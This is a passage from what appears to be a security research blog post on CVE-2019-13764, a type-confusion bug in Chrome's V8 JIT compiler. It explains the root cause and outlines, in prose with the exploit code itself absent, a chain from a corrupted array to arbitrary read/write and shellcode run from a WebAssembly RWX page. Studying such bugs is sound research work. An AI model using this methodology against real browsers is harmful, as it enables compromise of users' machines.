https://docs.oasis-open.org/cti/stix/v2.1/os/stix-v2.1-os.pdf

2. TAXII 2.1 documentation:
https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.pdf

3. cti-training: STIX2-TAXII2 workshop:
https://github.com/oasis-open/cti-training/blob/master/june-2018-FIRST-half-day-training/FIRST%20STIX2-TAXII2%20Workshop%20June%202018.pdf

4. CTI documentation:
https://oasis-open.github.io/cti-documentation/

5. OASIS:
https://www.oasis-open.org/

 

CVE-2019-13764: From Root-Cause to BASH

Overview:

Over the past couple of weeks, some of our team members were tasked with researching browsers. Since Chrome is the most popular browser nowadays, the team decided to jump into Chrome and Chrome exploitation research.

There are quite a lot of resources that can get anyone started with Chrome vulnerability research. In our experience, the best way is to get our hands dirty and jump directly into root-causing a vulnerability, followed by an attempt to write an exploit for it.

There has been a lot of noise about JIT bugs, due to the sheer number of bugs found exploited in the wild. They’re definitely having their fair share nowadays: the massive complexity of JIT comes at a price. That said, we decided to go ahead and research JIT bugs and JIT exploitation in general.

So, what’s the best way to get started? Pick a CVE and tear it apart; root-cause and exploit it. There’s a lot out there, and the one we decided to pursue was CVE-2019-13764.

According to Google’s bulletin, the bug is a type confusion in V8. The root cause of the vulnerability was unclear from the initial report. Besides that, there was a reference to a threat actor trying to exploit it in the wild, which made it all the more interesting to pursue.

 

Root Cause:

With the lack of public information about this vulnerability, the best way to start understanding it is by checking the patch commits. Two modifications were made in order to fix this bug, in the following files:

  • src/compiler/graph-reducer.cc

  • src/compiler/typer.cc

Armed with that, we started analyzing the changes made in those files. During the analysis of the typer source, we noticed that the bug occurs at typer.cc:855, when the induction variable sums -Infinity with +Infinity, which results in NaN. The compiler infers (-Infinity, +Infinity) as the induction variable type, while the actual value after the summation is NaN.
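The arithmetic at the heart of the bug is easy to reproduce; under IEEE-754, adding opposite infinities yields NaN, a value outside the inferred range:

# IEEE-754: the sum of opposite infinities is NaN, not a value in
# (-Infinity, +Infinity) as the typer assumed.
print(float("-inf") + float("inf"))   # nan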

The next step was to dynamically put the bug under the microscope.


Triggering the Bug:

The bug can be triggered using the following PoC:

Exploitation:

After a lot of reading and research about JIT bugs and JIT exploitation, it seemed that exploiting JIT vulnerabilities follows the same general methodology:

  1. Trigger the bug and the integer miscalculation to gain R/W using a corrupted array

  2. Create addrof and fakeobj primitives

  3. Get arbitrary read and write using addrof and fakeobj

  4. Create an RWX page using WebAssembly

  5. Leak the address of the RWX page

  6. Copy shellcode to the RWX page

  7. Execute shellcode by calling a Wasm instance method.

Step 1: Triggering the bug and the integer miscalculation.

The initial trigger was modified to perform a series of operations aimed at transforming the type mismatch into an integer miscalculation. We then used the result of the integer miscalculation to create a corrupted array, giving us R/W access.

Step 2: Create addrof and fakeobj functions

The addrof function is a helper function that takes an object as an argument and returns the address of that object in memory. It uses the corrupted array to achieve the arbitrary read.

Using the corrupted array, we change the value from the object map to a float array map:

After storing the address, we then restore the map back to its original value:

The fakeobj function is a helper function that takes an address and uses it to return a fake object. We need to use a float array and store the given memory address at index 0:

Afterwards, the float array map is changed to an array of objects:

Finally, store the value then return the map back to its original value:

Step 3: Getting arbitrary read and write using addrof and fakeobj

To get arbitrary read we need to create a float array and set index 0 to a float array map as follows:

Now we need to position a fakeobj right on top of our new crafted array with a float array map:

Change the elements pointer using our crafted array to read_addr-0x10:

Index 0 will then return the value at read_addr.

To get arbitrary write we will use the arb_rw_arr array that we declared before, then place a fakeobj right on top of our crafted array with a float array map:

Then, change the elements pointer using our crafted array to write_addr-0x10:

Finally, write at index 0 as a floating-point value:
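As an aside, writing an address “as a floating-point value” works because the same 8 bytes can be read as either a double or a 64-bit integer. V8 exploits typically implement the conversion helpers with typed arrays in JavaScript; the idea itself can be shown in a few lines of Python:

import struct

def itof(i):
    # Reinterpret 64 integer bits as an IEEE-754 double.
    return struct.unpack("<d", struct.pack("<Q", i))[0]

def ftoi(f):
    # Reinterpret an IEEE-754 double as 64 integer bits.
    return struct.unpack("<Q", struct.pack("<d", f))[0]

addr = 0x41414141
assert ftoi(itof(addr)) == addr   # the conversion round-trips losslessly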

Step 4: Create RWX page using WebAssembly:

Step 5: Copy the shellcode to the RWX page:

First, we need to locate the RWX page address using the addrof function:

Then, we create and copy the shellcode:

Finally, we copy our shellcode to the RWX page:

Step 6: Execute shellcode by calling a Wasm instance method.

The shellcode execution is achieved by calling a Wasm function.

Conclusion:

JIT bugs are quite fun to exploit. Luckily, Wasm is a big help and makes the exploitation process a lot more pleasant because of the RWX pages it creates.

Most JIT bugs can be exploited in the same manner using the same methodology. Because of the increased use of Wasm in JIT exploitation, some sort of mitigation or hardening against these exploitation techniques is likely to appear.

We hope that you enjoyed this technical piece. Stay tuned for more browser exploitation blogs in the future.

The full exploit can be found on our GitHub.


References:

https://github.com/HaboobLab/CVE-2019-13764

https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html

https://abiondo.me/2019/01/02/exploiting-math-expm1-v8/

https://faraz.faith/2019-12-13-starctf-oob-v8-indepth/

